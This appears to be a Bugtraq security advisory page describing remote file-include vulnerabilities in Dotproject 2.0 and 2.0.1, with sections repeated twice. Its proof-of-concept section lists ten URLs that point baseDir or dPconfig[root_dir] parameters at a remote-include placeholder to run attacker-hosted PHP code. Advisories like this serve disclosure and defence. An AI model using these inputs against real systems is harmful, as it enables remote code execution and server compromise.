Dotproject Multiple Remote File Include Vulnerabilities
BID:16648
Info
Dotproject Multiple Remote File Include Vulnerabilities
| Bugtraq ID: | 16648 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Feb 14 2006 12:00AM |
| Updated: | Feb 14 2006 10:08PM |
| Credit: | [email protected] is credited with the discovery of these vulnerabilities. |
| Vulnerable: |
Dotproject Dotproject 2.0.1 Dotproject Dotproject 2.0 |
| Not Vulnerable: | |
Discussion
Dotproject Multiple Remote File Include Vulnerabilities
Dotproject is prone to multiple remote file-include vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input.
An attacker can exploit these issues to include an arbitrary remote file containing malicious PHP code and execute it in the context of the webserver process. These may facilitate a compromise of the application and the underlying system; other attacks are also possible.
Dotproject is prone to multiple remote file-include vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input.
An attacker can exploit these issues to include an arbitrary remote file containing malicious PHP code and execute it in the context of the webserver process. These may facilitate a compromise of the application and the underlying system; other attacks are also possible.
Exploit / POC
Dotproject Multiple Remote File Include Vulnerabilities
An exploit is not required.
The following proof of concept exploits are available:
http://www.example.com/includes/db_adodb.php?baseDir=[REMOTE INCLUDE]
http://www.example.com/includes/db_connect.php?baseDir=[REMOTE INCLUDE]
http://www.example.com/includes/session.php?baseDir=[REMOTE INCLUDE]
http://www.example.com/modules/projects/gantt.php?dPconfig[root_dir]=[REMOTE INCLUDE]
http://www.example.com /modules/projects/gantt2.php?dPconfig[root_dir]=[REMOTE INCLUDE]
http://www.example.com /modules/projects/vw_files.php?dPconfig[root_dir]=[REMOTE INCLUDE]
http://www.example.com /modules/admin/vw_usr_roles.php?baseDir=[REMOTE INCLUDE]
http://www.example.com /modules/public/calendar.php?baseDir=[REMOTE INCLUDE]
http://www.example.com /modules/public/date_format.php?baseDir=[REMOTE INCLUDE]
http://www.example.com /modules/tasks/gantt.php?baseDir=[REMOTE INCLUDE]
An exploit is not required.
The following proof of concept exploits are available:
http://www.example.com/includes/db_adodb.php?baseDir=[REMOTE INCLUDE]
http://www.example.com/includes/db_connect.php?baseDir=[REMOTE INCLUDE]
http://www.example.com/includes/session.php?baseDir=[REMOTE INCLUDE]
http://www.example.com/modules/projects/gantt.php?dPconfig[root_dir]=[REMOTE INCLUDE]
http://www.example.com /modules/projects/gantt2.php?dPconfig[root_dir]=[REMOTE INCLUDE]
http://www.example.com /modules/projects/vw_files.php?dPconfig[root_dir]=[REMOTE INCLUDE]
http://www.example.com /modules/admin/vw_usr_roles.php?baseDir=[REMOTE INCLUDE]
http://www.example.com /modules/public/calendar.php?baseDir=[REMOTE INCLUDE]
http://www.example.com /modules/public/date_format.php?baseDir=[REMOTE INCLUDE]
http://www.example.com /modules/tasks/gantt.php?baseDir=[REMOTE INCLUDE]
Solution / Fix
Dotproject Multiple Remote File Include Vulnerabilities
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected]
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected]
References
Dotproject Multiple Remote File Include Vulnerabilities
References:
References: